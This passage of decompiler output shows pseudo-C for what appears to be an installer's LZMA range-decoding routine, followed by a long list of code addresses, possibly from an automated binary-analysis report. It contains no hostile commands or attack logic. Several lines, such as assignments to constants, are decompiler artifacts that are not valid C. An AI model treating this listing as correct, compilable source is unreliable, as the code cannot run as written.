											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407068
                                                                                                                                                                                                                            0x00407068
                                                                                                                                                                                                                            0x0040706c
                                                                                                                                                                                                                            0x00407095
                                                                                                                                                                                                                            0x0040709f
                                                                                                                                                                                                                            0x0040706e
                                                                                                                                                                                                                            0x00407077
                                                                                                                                                                                                                            0x00407084
                                                                                                                                                                                                                            0x00407087
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073d4
                                                                                                                                                                                                                            0x004073da
                                                                                                                                                                                                                            0x004073e0
                                                                                                                                                                                                                            0x004073fa
                                                                                                                                                                                                                            0x004073fd
                                                                                                                                                                                                                            0x00407403
                                                                                                                                                                                                                            0x0040740e
                                                                                                                                                                                                                            0x00407410
                                                                                                                                                                                                                            0x004073e2
                                                                                                                                                                                                                            0x004073e2
                                                                                                                                                                                                                            0x004073f1
                                                                                                                                                                                                                            0x004073f5
                                                                                                                                                                                                                            0x004073f5
                                                                                                                                                                                                                            0x0040741a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040741c
                                                                                                                                                                                                                            0x00407420
                                                                                                                                                                                                                            0x004075cf
                                                                                                                                                                                                                            0x004075e5
                                                                                                                                                                                                                            0x004075ed
                                                                                                                                                                                                                            0x004075f4
                                                                                                                                                                                                                            0x004075f6
                                                                                                                                                                                                                            0x004075fd
                                                                                                                                                                                                                            0x00407601
                                                                                                                                                                                                                            0x00407601
                                                                                                                                                                                                                            0x0040742c
                                                                                                                                                                                                                            0x00407433
                                                                                                                                                                                                                            0x0040743b
                                                                                                                                                                                                                            0x0040743e
                                                                                                                                                                                                                            0x00407441
                                                                                                                                                                                                                            0x00407441
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00406be3
                                                                                                                                                                                                                            0x00406be3
                                                                                                                                                                                                                            0x00406be3
                                                                                                                                                                                                                            0x00406bec
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bfd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c06
                                                                                                                                                                                                                            0x00406c09
                                                                                                                                                                                                                            0x00406c0c
                                                                                                                                                                                                                            0x00406c10
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c16
                                                                                                                                                                                                                            0x00406c19
                                                                                                                                                                                                                            0x00406c1b
                                                                                                                                                                                                                            0x00406c1c
                                                                                                                                                                                                                            0x00406c1f
                                                                                                                                                                                                                            0x00406c21
                                                                                                                                                                                                                            0x00406c22
                                                                                                                                                                                                                            0x00406c24
                                                                                                                                                                                                                            0x00406c27
                                                                                                                                                                                                                            0x00406c2c
                                                                                                                                                                                                                            0x00406c31
                                                                                                                                                                                                                            0x00406c3a
                                                                                                                                                                                                                            0x00406c4d
                                                                                                                                                                                                                            0x00406c50
